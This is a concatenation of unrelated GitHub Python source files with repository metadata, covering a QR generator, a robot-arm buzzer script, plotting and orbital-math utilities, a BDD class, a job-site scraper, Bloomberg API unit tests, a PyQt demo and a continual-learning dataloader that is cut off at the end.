command=create_code)\nmy_button.pack(pady=20)\n\nmy_button2= Button(root, text=\"clear\", command=clear_all)\nmy_button2.pack()\n\nmy_label = Label(root, text= '')\nmy_label.pack(pady=20)\n\nroot.mainloop()","repo_name":"ashiqu-ali/QR-code-Generator","sub_path":"qrgenerator.py","file_name":"qrgenerator.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"5684223395","text":"import os\nimport sys\nimport time\nimport pretty_midi\nsys.path.append(os.path.join(os.path.dirname(__file__), '../../..'))\nfrom uarm.wrapper import SwiftAPI\n\nswift1 = SwiftAPI(filters={'hwid': 'USB VID:PID=2341:0042'})\n# swift2 = SwiftAPI(filters={'hwid': 'USB VID:PID=2341:0042'})\n# swift3 = SwiftAPI(filters={'hwid': 'USB VID:PID=2341:0042'})\n\nswift1.waiting_ready()\ndevice_info = swift1.get_device_info()\nprint(swift1.port, device_info)\nfirmware_version = device_info['firmware_version']\nif firmware_version and not firmware_version.startswith(('0.', '1.', '2.', '3.')):\n swift1.set_speed_factor(0.00001)\n\ntime.sleep(1)\n\n\nd = {\n \"A\" : 0,\n \"A#\" : 1, \n \"B\" : 2,\n \"C\" : 3,\n \"C#\" : 4,\n \"D\" : 5,\n \"D#\" : 6,\n \"E\" : 7,\n \"F\" : 8,\n \"F#\" : 9,\n \"G\" : 10,\n \"G#\" : 11\n\n}\n\ndef freq(sc, pitch):\n return 440 * pow(2, ( d[sc] + pitch * 12 ) / 12)\n\n\n# midiData = pretty_midi.PrettyMIDI('')\n\nswift1.set_buzzer(frequency=freq(\"C\", -1), duration=0.5)","repo_name":"Nwnn/uarmswift-apps","sub_path":"music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"40883672509","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mesostat.visualization.mpl_colors import base_colors_rgb\n\n\n# Convert degrees to radians\ndef _deg2rad(phi):\n return phi * np.pi / 180\n\n\n# Rotate a vector clockwise around the origin\ndef _rot(p, phi):\n s = np.sin(phi)\n c = np.cos(phi)\n R = np.array([[c, -s], [s, c]])\n return R.dot(p)\n\n\n# Get coordinates of equilateral triangle of given origin, radius and rotation\ndef _uni_triangle_points(p0, rad, phi):\n pRef = np.array([rad, 0])\n p1 = p0 + _rot(pRef, _deg2rad(phi))\n p2 = p0 + _rot(pRef, _deg2rad(phi + 120))\n p3 = p0 + _rot(pRef, _deg2rad(phi + 240))\n return p1, p2, p3\n\n\n# Construct a line segment between points p1 and p2\n# Shift that line segment by sh\n# Direction of shift determined by angle phi relative to the original direction of the vector p2-p1\n# Return list of x and y coordinates separately\ndef _sh_line_points(p1, p2, phi, sh):\n v = p2 - p1\n vSh = v / np.linalg.norm(v) * sh # Normalize\n vShRot = _rot(vSh, phi) # Rotate\n p1sh = p1 + vShRot # Shift\n p2sh = p2 + vShRot # Shift\n return [p1sh[0], p2sh[0]], [p1sh[1], p2sh[1]]\n\n\ndef sketch_pid(ax, pidDict, colorsDict=None,\n radiusMacro=3, radiusCircle=1, colorCircle='lightgray', maxLineWidth=15,\n rotation=90, fontsize=30):\n '''\n :param ax: Plot axis\n :param u1: Unique information, source X. Allowed values between [0, 1], please rescale\n :param u2: Unique information, source Y. Allowed values between [0, 1], please rescale\n :param red: Redundant information, target Z. Allowed values between [0, 1], please rescale\n :param syn: Synergistic information, target Z. Allowed values between [0, 1], please rescale\n :param radiusMacro: Radius on which the three circles are placed\n :param radiusCircle: Radius of each circle\n :param colorCircle: Color of each circle\n :param maxLineWidth: Maximum line width for unique and synergistic lines\n :param colorU1: Color of Unique information, source X\n :param colorU2: Color of Unique information, source Y\n :param colorRed: Color of Redundant information, target X\n :param colorSyn: Color of Synergistic information, target X\n :param rotation: Rotation of the plot (direction where target is pointing)\n :param fontsize: Font size for source and target labels\n :return:\n '''\n\n\n if colorsDict is None:\n tableauColors = base_colors_rgb(key='tableau')\n colorsDict = {\n 'unq_s1' : tableauColors[0],\n 'unq_s2' : tableauColors[1],\n 'shd_s1_s2' : tableauColors[2],\n 'syn_s1_s2' : tableauColors[3]\n }\n\n # Center plot at origin\n p0 = np.array([0, 0])\n\n ##################################\n # Construct and annotate circle\n ##################################\n pZ, pX, pY = _uni_triangle_points(p0, radiusMacro, rotation)\n\n circleX = plt.Circle(pX, radius=radiusCircle, color=colorCircle, zorder=2)\n circleY = plt.Circle(pY, radius=radiusCircle, color=colorCircle, zorder=2)\n circleZ = plt.Circle(pZ, radius=radiusCircle, color=colorCircle, zorder=2)\n\n ax.add_patch(circleX)\n ax.add_patch(circleY)\n ax.add_patch(circleZ)\n\n labelX = ax.annotate(\"X\", xy=pX, fontsize=fontsize, ha=\"center\", va=\"center\")\n labelY = ax.annotate(\"Y\", xy=pY, fontsize=fontsize, ha=\"center\", va=\"center\")\n labelZ = ax.annotate(\"Z\", xy=pZ, fontsize=fontsize, ha=\"center\", va=\"center\")\n\n\n ##################################\n # Construct and annotate Unique and Redundant\n ##################################\n\n linewidthU1 = maxLineWidth * pidDict['unq_s1']\n linewidthU2 = maxLineWidth * pidDict['unq_s2']\n linewidthRed = maxLineWidth * pidDict['shd_s1_s2']\n\n lpUnqXZ = _sh_line_points(pX, pZ, _deg2rad(90), radiusCircle / 2)\n lpUnqYZ = _sh_line_points(pY, pZ, _deg2rad(-90), radiusCircle / 2)\n lpRedXZ = _sh_line_points(pX, pZ, _deg2rad(-90), 0)\n lpRedYZ = _sh_line_points(pY, pZ, _deg2rad(90), 0)\n\n lineUnqXZ = plt.Line2D(*lpUnqXZ, color=colorsDict['unq_s1'], linewidth=linewidthU1, zorder=1)\n lineUnqYZ = plt.Line2D(*lpUnqYZ, color=colorsDict['unq_s2'], linewidth=linewidthU2, zorder=1)\n lineRedXZ = plt.Line2D(*lpRedXZ, color=colorsDict['shd_s1_s2'], linewidth=linewidthRed, zorder=1)\n lineRedYZ = plt.Line2D(*lpRedYZ, color=colorsDict['shd_s1_s2'], linewidth=linewidthRed, zorder=1)\n\n ax.add_line(lineUnqXZ)\n ax.add_line(lineUnqYZ)\n ax.add_line(lineRedXZ)\n ax.add_line(lineRedYZ)\n\n\n ##################################\n # Construct and annotate Synergy\n ##################################\n\n radiusSynergy = (radiusMacro - radiusCircle) * pidDict['syn_s1_s2']\n pZsyn, pXsyn, pYsyn = _uni_triangle_points(p0, radiusSynergy, rotation)\n\n triangleSyn = plt.Polygon(np.array([pXsyn, pYsyn, pZsyn]), color=colorsDict['syn_s1_s2'])\n ax.add_patch(triangleSyn)\n\n\n ##################################\n # Tuning\n ##################################\n\n ax.axis('off')\n ax.set_aspect('equal')\n ax.autoscale_view()\n","repo_name":"HelmchenLabSoftware/mesostat-dev","sub_path":"mesostat/visualization/metric/pid.py","file_name":"pid.py","file_ext":"py","file_size_in_byte":5234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4373448346","text":"import math\nimport scipy.special\n\ndef optimal_Newton_E0(M, e):\n \n if e >=1:\n print(\"Cannot use initial E0 function with e >= 1\")\n SystemExit\n \n if M >= 0 and M < 0.25:\n E_0 = M + e*e * (math.pow(6.*M, 1./3.) - M)\n elif M >= 0.25 and M <= math.pi:\n numer = e * math.sin(M)\n denom = 1. - math.sin(M + e) + math.sin(M)\n E_0 = M + (numer/denom)\n else:\n print(\"M out of bounds\")\n SystemExit\n \n return E_0\n\ndef Newton_Raphson(e, M, desired_accuracy):\n \n E_0 = optimal_Newton_E0(M, e)\n \n E_i = E_0\n E_j = Newton_Raphson_Iteration(E_i, e, M)\n \n while (abs(E_i - E_j) > desired_accuracy):\n E_i = E_j\n E_j = Newton_Raphson_Iteration(E_i, e, M)\n \n return E_j\n \n\ndef Newton_Raphson_Iteration(E_i, e, M):\n func_deriv_quotient_numer = E_i - e * math.sin(E_i) - M\n func_deriv_quotient_denom = 1. - e * math.cos(E_i)\n func_deriv_quotient = func_deriv_quotient_numer / func_deriv_quotient_denom\n \n E_j = E_i - func_deriv_quotient\n \n return E_j\n\n\n# get nth taylor expansion coefficient\ndef taylor_coeff_func_eccentricity(n, M):\n if n == 0:\n return M\n else:\n prefac = 1. / (math.pow(2., n -1) * math.factorial(n))\n\n running_sum = 0\n \n for k in range(0, math.floor(n/2) + 1):\n term1 = math.pow(-1., k) * scipy.special.binom(n, k)\n term2 = math.pow(n - 2.*k, n-1.) * math.sin((n - 2.*k) * M)\n running_sum += (term1 * term2)\n \n return running_sum * prefac","repo_name":"nuclth/math_explore","sub_path":"kepler_solutions.py","file_name":"kepler_solutions.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42102298899","text":"from weakref import WeakValueDictionary\n\nclass BDD:\n \"\"\"\n Binary Decision Diagram (p149).\n\n Attributes:\n idx (int): node index\n sign (bool): the node's sign\n child (list(BDD, BDD)): the node's *else* and *then* successors\n\n Note:\n Operations are carried out using the logical connectives ``~``, ``|``,\n ``&`` and ``^``.\n \"\"\"\n __unique__ = WeakValueDictionary()\n\n __id__ = lambda idx, sign, child: \\\n hash((idx, sign, id(child[0]), id(child[1]))) \\\n if child is not None else \\\n 1 if sign else 0\n\n def __hash__ (self):\n return BDD.__id__(self.idx, self.sign, self.child)\n\n def __new__ (BDD, *args):\n def new_bdd (idx, sign, child):\n node = BDD.__id__(idx, sign, child)\n if node not in BDD.__unique__:\n bdd = object.__new__(BDD)\n bdd.idx = idx\n bdd.sign = sign\n bdd.child = child\n BDD.__unique__[node] = bdd\n\n return BDD.__unique__[node]\n\n idx = args[0]\n sign = args[1] if len(args) > 1 else False\n child = \\\n None if idx < 0 \\\n else \\\n args[2] if len(args) > 2 and args[2] is not None \\\n else [ BDD.false(), BDD.true() ]\n\n if child is not None:\n if child[0] == child[1]:\n return child[0]\n\n if BDD.__id__(idx, not sign, child) not in BDD.__unique__:\n sign = child[0].sign\n if sign:\n child[0] = ~child[0]\n child[1] = ~child[1]\n\n return new_bdd(idx, sign, child)\n\n def __repr__ (self):\n if self.isConstant():\n return \"BDD({}, {})\".format(self.idx, self.sign)\n else:\n return \"BDD({}, {}, {})\".format(self.idx, self.sign, self.child)\n\n @classmethod\n def __top_idx__ (BDD, *args):\n return max(bdd.idx for bdd in args)\n\n def __cofactor__ (self, pos, idx):\n if self.isConstant():\n return self\n\n sign = self.sign\n if sign:\n self = ~self\n\n res = self.child[pos] if self.idx == idx else self\n\n return ~res if sign else res\n\n @classmethod\n def __cofactor2__ (BDD, a, b):\n idx = BDD.__top_idx__(a, b)\n\n c = [\n [ a.__cofactor__(0, idx), a.__cofactor__(1, idx) ],\n [ b.__cofactor__(0, idx), b.__cofactor__(1, idx) ]\n ]\n\n return (idx, c)\n\n @classmethod\n def __apply__ (BDD, op, a, b):\n if a.isConstant() and b.isConstant():\n return BDD.true() if op(bool(a), bool(b)) else BDD.false()\n\n idx, c = BDD.__cofactor2__(a, b)\n bdd = BDD(\n idx,\n False,\n [\n BDD.__apply__(op, c[0][0], c[1][0]),\n BDD.__apply__(op, c[0][1], c[1][1])\n ]\n )\n\n return bdd\n\n def __bool__ (self):\n return self.sign\n\n def __invert__ (self):\n if self.isConstant():\n return BDD.false() if self else BDD.true()\n\n return BDD(self.idx, not self.sign, self.child)\n\n def __and__ (self, other):\n return BDD.__apply__(bool.__and__, self, other)\n\n def __or__ (self, other):\n return BDD.__apply__(bool.__or__, self, other)\n\n def __xor__ (self, other):\n return BDD.__apply__(bool.__xor__, self, other)\n\n def __eq__ (self, other):\n return hash(self) == hash(other)\n\n def __neq__ (self, other):\n return not self == other\n\n __true__ = None\n\n @classmethod\n def true (BDD):\n \"\"\"Boolean constant ``True``.\"\"\"\n if BDD.__true__ is None:\n BDD.__true__ = BDD(-1, True)\n return BDD.__true__\n\n __false__ = None\n\n @classmethod\n def false (BDD):\n \"\"\"Boolean constant ``False``.\"\"\"\n if BDD.__false__ is None:\n BDD.__false__ = BDD(-1, False)\n return BDD.__false__\n\n def isConstant (self):\n \"\"\"Returns ``True`` for constant nodes.\"\"\"\n return self.idx < 0\n\n def toDot (self):\n \"\"\"\n Returns a graphical representation of the BDD (using `Graphviz\n `_).\n\n Returns:\n string: dot language representation\n \"\"\"\n declared = set()\n\n def declare (bdd, node):\n if node in declared:\n return \"\"\n\n declared.add(node)\n\n if bdd.isConstant():\n return \"\\t\\\"{}\\\" [shape=box]\\n\".format(node)\n else:\n return \"\\t\\\"{}\\\" [label=\\\"@{}\\\"{}]\\n\".format(\n node,\n bdd.idx,\n \"\" if bdd.sign else \",color=red\"\n )\n\n def bdd2dot (bdd):\n edge = \"\\t\\\"{}\\\" -- \\\"{}\\\" {}\\n\"\n node = hash(bdd)\n dot = declare(bdd, node)\n if bdd.isConstant():\n return dot\n\n for child in bdd.child:\n childNode = hash(child)\n dot += declare(child, childNode)\n dot += edge.format(\n node,\n childNode,\n \"\" if child == bdd.child[1] else \"[style=dashed,color=red]\"\n )\n dot += bdd2dot(child)\n\n return dot\n\n return \"graph BDD {\\n\" + bdd2dot(self) + \"}\\n\"\n","repo_name":"phlo/libmc","sub_path":"libmc/bdd.py","file_name":"bdd.py","file_ext":"py","file_size_in_byte":5379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19252287681","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport urllib.request\nimport urllib.parse\nimport json\n\n\ndef open_url(url, page_num, keywords):\n try:\n # 设置post请求参数\n page_data = urllib.parse.urlencode([\n ('pn', page_num),\n ('kd', keywords)\n ])\n # 设置headers\n page_headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0',\n 'Connection': 'keep-alive',\n 'Host': 'www.lagou.com',\n 'Origin': 'https://www.lagou.com',\n 'Cookie': 'JSESSIONID=ABAAABAABEEAAJA8F28C00A88DC4D771796BB5C6FFA2DDA; user_trace_token=20170715131136-d58c1f22f6434e9992fc0b35819a572b; LGUID=20170715131136-13c54b92-691c-11e7-893a-525400f775ce; index_location_city=%E5%8C%97%E4%BA%AC; _gat=1; TG-TRACK-CODE=index_search; _gid=GA1.2.496231841.1500095497; _ga=GA1.2.1592435732.1500095497; Hm_lvt_4233e74dff0ae5bd0a3d81c6ccf756e6=1500095497; Hm_lpvt_4233e74dff0ae5bd0a3d81c6ccf756e6=1500104021; LGSID=20170715143221-5b993c04-6927-11e7-a985-5254005c3644; LGRID=20170715153341-ec8dbfd2-692f-11e7-a989-5254005c3644; SEARCH_ID=d27de6042bdf4d508cf9b39616a98a0d',\n 'Accept': 'application/json, text/javascript, */*; q=0.01',\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n 'Referer': 'https://www.lagou.com/jobs/list_%E6%95%B0%E6%8D%AE%E6%8C%96%E6%8E%98?labelWords=&fromSearch=true&suginput=',\n 'X-Anit-Forge-Token': 'None',\n 'X-Requested-With': 'XMLHttpRequest'\n }\n # 打开网页\n req = urllib.request.Request(url, headers=page_headers)\n content = urllib.request.urlopen(req, data=page_data.encode('utf-8')).read().decode('utf-8')\n return content\n except Exception as e:\n print(str(e))\n\n\n# 获取招聘职位信息\ndef get_position(url, page_num):\n try:\n page_content = open_url(url, page_num, keywords)\n data = json.loads(page_content)\n content = data.get('content')\n positionResult = content.get('positionResult').get('result')\n result = [('positionId', '职位ID'), ('positionName', '职位名称'), ('salary', '薪资'), ('createTime', '发布时间'), ('workYear', '工作经验'), ('education', '学历'),\n ('positionLables', '职位标签'), ('jobNature', '职位类型'), ('firstType', '职位大类'), ('secondType', '职位细类'), ('positionAdvantage', '职位优势'),\n ('city', '城市'), ('district', '行政区'), ('businessZones', '商圈'), ('publisherId', '发布人ID'), ('companyId', '公司ID'), ('companyFullName', '公司名'),\n ('companyShortName', '公司简称'), ('companyLabelList', '公司标签'), ('companySize', '公司规模'), ('financeStage', '融资阶段'), ('industryField', '企业领域'),\n ('industryLables', '企业标签')]\n\n if (len(positionResult) > 0):\n for position in positionResult:\n print(position)\n with open(\"lagou_position.txt\", 'a', encoding=\"utf-8\") as fh:\n fh.write(\"---------------------------\\n\")\n for r in result:\n with open(\"lagou_position.txt\", 'a', encoding=\"utf-8\") as fh:\n fh.write(str(r[1]) + \":\" + str(position.get(r[0])) + \"\\n\")\n return len(positionResult)\n except Exception as e:\n print(str(e))\n\n\n# 爬取拉勾网招聘职位信息\nif __name__ == \"__main__\":\n # 爬取起始页\n city = urllib.parse.quote(\"深圳\")\n url = 'https://www.lagou.com/jobs/positionAjax.json?city={city}&needAddtionalResult=false'.format(city=city)\n print(url)\n # 设置查询的关键词\n keywords = \"CTO\"\n page_num = 1\n while True:\n print(\"正在爬取第\" + str(page_num) + \"页......\")\n result_len = get_position(url, page_num)\n if (result_len > 0):\n page_num += 1\n else:\n break\n print(\"爬取完成\")\n","repo_name":"East196/aispider","sub_path":"custom/lagou.py","file_name":"lagou.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"70630795271","text":"# def solution(n, m, spot, plan):\n# print(spot)\n# inf = int(1e9)\n# for i in range(n):\n# for j in range(m):\n# if i == j:\n# continue\n# if spot[i][j] == 1:\n# continue\n# spot[i][j] = inf\n#\n# for k in range(n):\n# for i in range(n):\n# for j in range(n):\n# spot[i][j] = min(spot[i][j], spot[i][k] + spot[k][j])\n#\n# flag = True\n# for i in range(1, m):\n# if spot[plan[i-1] - 1][plan[i] - 1] == inf:\n# flag = False\n# break\n#\n# if flag:\n# return \"YES\"\n# else:\n# return \"NO\"\n\ndef find(x, parent):\n if parent[x] != x:\n parent[x] = find(parent[x], parent)\n return parent[x]\n\n\ndef union(a, b, parent):\n a = find(a, parent)\n b = find(b, parent)\n if a < b:\n parent[b] = a\n else:\n parent[a] = b\n\n\ndef solution(n, m, spot, plan):\n parent = [0] * (n + 1)\n for i in range(1, n + 1):\n parent[i] = i\n\n for i in range(n):\n for j in range(i, n):\n if spot[i][j] == 1:\n union(i+1, j+1, parent)\n\n flag = True\n for i in range(1, len(plan)):\n if parent[plan[i]] != parent[plan[i-1]]:\n flag = False\n break\n\n if flag:\n return \"YES\"\n else:\n return \"NO\"\n\n\n\nprint(solution(\n 5, 4,\n [[0, 1, 0, 1, 1],\n [1, 0, 1, 1, 0],\n [0, 1, 0, 0, 0],\n [1, 1, 0, 0, 0],\n [1, 0, 0, 0, 0]],\n [2, 3, 4, 3]\n))\n\nprint(solution(\n 5, 4,\n [[0, 0, 0, 0, 0],\n [0, 0, 1, 1, 0],\n [0, 1, 0, 0, 0],\n [0, 1, 0, 0, 0],\n [0, 0, 0, 0, 0]],\n [2, 3, 4, 3]\n))\n\nprint(solution(\n 5, 4,\n [[0, 0, 0, 0, 0],\n [0, 0, 1, 1, 0],\n [0, 1, 0, 0, 0],\n [0, 1, 0, 0, 0],\n [0, 0, 0, 0, 0]],\n [2, 3, 4, 3, 5]\n))","repo_name":"Akgop/Problem-Solving","sub_path":"Graph(MST,TopologySort)/thisiscote_graph_q41.py","file_name":"thisiscote_graph_q41.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"3324881064","text":"\"\"\" Test suite for TokenGenerator. \"\"\"\n\nimport unittest\n\ntry:\n from unittest.mock import Mock\nexcept ImportError:\n from mock import Mock\n\nimport os\nimport sys\n\n# pylint: disable=line-too-long,wrong-import-position\nsys.path.insert(\n 0, os.path.abspath(os.path.join(os.path.dirname(__file__), \"../src\"))\n)\nfrom token_generator import TokenGenerator\n\nimport blpapi\n\n\nclass TestTokenGenerator(unittest.TestCase):\n \"\"\"Test cases for TokenGenerator.\"\"\"\n\n def setUp(self):\n self.mock_session = Mock()\n self.mock_event_queue = Mock()\n self.token_generator = TokenGenerator(self.mock_session)\n\n def testTokenGenerationSuccess(self):\n \"\"\"Verify that on token generation success, the application receives\n a valid token.\n\n Plan:\n 1. Create a TokenStatus admin event using blpapi.test.createEvent().\n 2. Obtain the schema for TokenGenerationSuccess using\n blpapi.test.getAdminMessageDefinition().\n 3. Append a message of type TokenGenerationSuccess using\n blpapi.test.appendMessage().\n 4. Using the returned formatter, format the message. In this example\n the message has body { \"token\": \"dummy_token\" }.\n `token` is the element name, and `dummy_token` is the token value\n which will be delivered to the client application.\n 5. Setup the event queue to return the appropriate event.\n 6. Verify that the expected token value is generated.\n \"\"\"\n event = blpapi.test.createEvent(blpapi.Event.TOKEN_STATUS)\n token_success = blpapi.Names.TOKEN_GENERATION_SUCCESS\n schema_def = blpapi.test.getAdminMessageDefinition(token_success)\n\n formatter = blpapi.test.appendMessage(event, schema_def)\n\n expected_token = \"dummy_token\"\n message_content = {\"token\": expected_token}\n\n formatter.formatMessageDict(message_content)\n\n self.mock_event_queue.nextEvent.return_value = event\n\n actual_token = self.token_generator.generate(self.mock_event_queue)\n\n self.mock_session.generateToken.assert_called_once()\n self.mock_event_queue.nextEvent.assert_called_once()\n self.assertEqual(expected_token, actual_token)\n\n def testTokenGenerationFailure(self):\n \"\"\"Verify that on token generation failure, the application receives an\n empty token.\n\n Plan:\n 1. Create a TokenStatus admin event using blpapi.test.createEvent().\n 2. Obtain schema for TokenGenerationFailure using\n blpapi.test.getAdminMessageDefinition().\n 3. Append a message of type TokenGenerationFailure using\n blpapi.test.appendMessage().\n 4. Using the returned formatter, format the message. In this example,\n the message body contains the reason for failure.\n The reason is delivered to the user application.\n 5. Setup the event queue to return the appropriate event.\n 6. Verify that the actual token is None.\n \"\"\"\n message_content = {\n \"reason\": {\n \"source\": \"apitkns (apiauth) on n795\",\n \"category\": \"NO_AUTH\",\n \"errorCode\": 3,\n \"description\": \"App not in emrs ...\",\n \"subcategory\": \"INVALID_APP\",\n }\n }\n event = blpapi.test.createEvent(blpapi.Event.TOKEN_STATUS)\n\n token_failure = blpapi.Names.TOKEN_GENERATION_FAILURE\n schema_def = blpapi.test.getAdminMessageDefinition(token_failure)\n\n formatter = blpapi.test.appendMessage(event, schema_def)\n\n formatter.formatMessageDict(message_content)\n\n self.mock_event_queue.nextEvent.return_value = event\n\n actual_token = self.token_generator.generate(self.mock_event_queue)\n\n self.mock_session.generateToken.assert_called_once()\n self.mock_event_queue.nextEvent.assert_called_once()\n self.assertIsNone(actual_token)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n\n__copyright__ = \"\"\"\nCopyright 2020. Bloomberg Finance L.P.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to\ndeal in the Software without restriction, including without limitation the\nrights to use, copy, modify, merge, publish, distribute, sublicense, and/or\nsell copies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions: The above\ncopyright notice and this permission notice shall be included in all copies\nor substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\nIN THE SOFTWARE.\n\"\"\"\n","repo_name":"msitt/blpapi-python","sub_path":"examples/unittests/market-data-notifier/tests/test_tokengenerator.py","file_name":"test_tokengenerator.py","file_ext":"py","file_size_in_byte":5064,"program_lang":"python","lang":"en","doc_type":"code","stars":305,"dataset":"github-code","pt":"27"} +{"seq_id":"1199033066","text":"from ..sampling import *\n\n\nclass Const(Sampling):\n def __init__(self, count: int):\n self.count = count\n self.name = 'Sampling: Const (%s)' % count\n\n def get_size(self, backdoor: Backdoor):\n return self.count\n\n\n__all__ = [\n 'Const'\n]\n","repo_name":"lytr777/EvoGuess","sub_path":"algorithm/modules/sampling/impls/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6522002372","text":"# -*- coding: utf8 -*-\n\nimport os\nfrom subprocess import CalledProcessError\nfrom twister import commands, get_twister_directory\n\ndef add_arguments(parser):\n parser.add_argument(\"--dest\", help=\"destination directory, must exist; default is /usr/local/bin\", default=\"/usr/local/bin\")\n parser.add_argument(\"--name\", help=\"name for the command, usually the name of the project; default is twister\", default=\"twister\")\n\ndef get_description():\n return \"Add shortcut to the twister, that allows to run twister from any directory. By default adds shortcut to the\" \\\n \" /usr/local/bin directory, but can be added to other directory, specified by --dest argument. Also default name\" \\\n \" is 'twister', but could and should be changed to the project name, as multiple different twister installation\" \\\n \" would be used in parallel.\"\n\ndef get_short_description():\n return \"add twister shortcut\"\n\ndef validate(validator):\n pass\n\ndef execute(context):\n try:\n twister_runner = os.path.join(get_twister_directory(), \"twister.sh\")\n commands.execute(\"ln -s %s %s\" % (twister_runner, os.path.join(context.args.dest, context.args.name)),\n output=context.args.verbose,\n error_text=\"Failed to add shortcut\")\n commands.execute(\"chmod 744 %s\" % twister_runner)\n return True\n except CalledProcessError:\n return False\n","repo_name":"rkhmelyuk/twister","sub_path":"twister/add_shortcut.py","file_name":"add_shortcut.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"41098912755","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n#@Time : 2019/11/29 0029 22:05\n#@Author : tb_youth\n#@FileName: SignalSlot0.py\n#@SoftWare: PyCharm\n#@Blog : https://blog.csdn.net/tb_youth\n\nimport sys\nfrom PyQt5.QtWidgets import QApplication,QWidget,QPushButton\n\nclass SignalSlotDemo(QWidget):\n def __init__(self):\n super(SignalSlotDemo,self).__init__()\n self.initUI()\n\n def initUI(self):\n self.setGeometry(300,300,500,400)\n self.setWindowTitle('信号与槽')\n self.btn = QPushButton('我的按钮',self)\n self.btn.clicked.connect(self.onClicked)\n\n def onClicked(self):\n self.btn.setText('信号已发出')\n self.btn.setStyleSheet(\"QPushButton(max-width:200px;min-width:200px)\")\n\n\nif __name__=='__main__':\n app = QApplication(sys.argv)\n window = SignalSlotDemo()\n window.show()\n sys.exit(app.exec_())\n","repo_name":"tbyouth/Learn-python-notes","sub_path":"projects/demo/SignalSlot/SignalSlot0.py","file_name":"SignalSlot0.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"7887161233","text":"import dataloaders.base\nfrom dataloaders.datasetGen import SplitGen, PermutedGen,RotatedGen\nfrom torch.nn.utils.convert_parameters import _check_param_device, parameters_to_vector, vector_to_parameters\nimport torch\n\n\n \ndef get_benchmark_data_loader(config):\n ## example: config.dataset_root_path='/home/usr/dataset/CIFAR100'\n config.dataset_root_path=''\n if config.dataset==\"permuted\":\n config.force_out_dim=10\n train_dataset, val_dataset = dataloaders.base.__dict__['MNIST'](config.dataset_root_path, False ,subset_size=config.subset_size)\n \n train_dataset_splits, val_dataset_splits, task_output_space = PermutedGen(train_dataset, val_dataset,config.n_tasks,remap_class= False)\n \n elif config.dataset==\"rotated\":\n config.force_out_dim=10\n import dataloaders.base\n \n Dataset = dataloaders.base.__dict__[\"MNIST\"]\n n_rotate=config.n_tasks \n \n rotate_step=5\n \n \n train_dataset_splits, val_dataset_splits, task_output_space = RotatedGen(Dataset=Dataset,\n dataroot=config.dataset_root_path,\n train_aug=False,\n n_rotate=n_rotate,\n rotate_step=rotate_step,\n remap_class=False\n ,subset_size=config.subset_size)\n \n elif config.dataset==\"split_mnist\":\n config.first_split_size=2\n config.other_split_size=2\n config.force_out_dim=0\n config.is_split=True\n import dataloaders.base\n Dataset = dataloaders.base.__dict__[\"MNIST\"]\n \n \n \n if config.subset_size<50000:\n train_dataset, val_dataset = Dataset(config.dataset_root_path,False, angle=0,noise=None,subset_size=config.subset_size)\n else:\n train_dataset, val_dataset = Dataset(config.dataset_root_path,False, angle=0,noise=None)\n train_dataset_splits, val_dataset_splits, task_output_space = SplitGen(train_dataset, val_dataset,\n first_split_sz=config.first_split_size,\n other_split_sz=config.other_split_size,\n rand_split=config.rand_split,\n remap_class=True)\n \n config.n_tasks = len(task_output_space.items())\n\n\n elif config.dataset==\"split_cifar\":\n config.force_out_dim=0\n config.first_split_size=5\n config.other_split_size=5\n config.is_split=True\n import dataloaders.base\n Dataset = dataloaders.base.__dict__[\"CIFAR100\"]\n # assert config.model_type == \"lenet\" # CIFAR100 is trained with lenet only\n \n train_dataset, val_dataset = Dataset(config.dataset_root_path,False, angle=0)\n \n train_dataset_splits, val_dataset_splits, task_output_space = SplitGen(train_dataset, val_dataset,\n first_split_sz=config.first_split_size,\n other_split_sz=config.other_split_size,\n rand_split=config.rand_split,\n remap_class=True)\n config.n_tasks=len(train_dataset_splits)\n \n config.out_dim = {'All': config.force_out_dim} if config.force_out_dim > 0 else task_output_space\n \n val_loaders = [torch.utils.data.DataLoader(val_dataset_splits[str(task_id)],\n batch_size=256,shuffle=False,\n num_workers=config.workers)\n for task_id in range(1, 